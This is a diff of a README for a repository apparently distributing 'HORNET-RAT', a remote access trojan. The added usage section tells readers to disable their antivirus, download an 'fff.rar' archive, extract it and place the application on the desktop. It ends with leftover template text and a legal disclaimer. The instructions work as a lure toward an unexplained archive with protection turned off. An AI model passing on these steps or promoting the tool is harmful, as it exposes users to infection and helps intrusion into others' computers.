queentessaru/HORNET-RAT/README.md

 - And more, more and more...

+## Usage

+### System Requirements:

+ • Operating System: Windows only.
+ • Disable your antivirus software for the proper functioning of the program.

+### Installation Instructions:

+ 1. Download the program from the GitHub repository.
+ 2. Locate and download the “fff.rar” file.
+ 3. Extract the application from the “fff.rar” file.
+ 4. Place the extracted application on your desktop.

+## Note: • Ensure that your antivirus software is disabled while using the program for seamless operation.

+For any further assistance or inquiries, please refer to the GitHub repository’s documentation or contact the developer.
+Feel free to customize this guide with specific details about your program and any additional information you’d like to provide.

 # Please be aware that HORNETrat and similar malware pose a significant threat to cybersecurity, and any attempt to deploy or use such software for malicious purposes is against the law.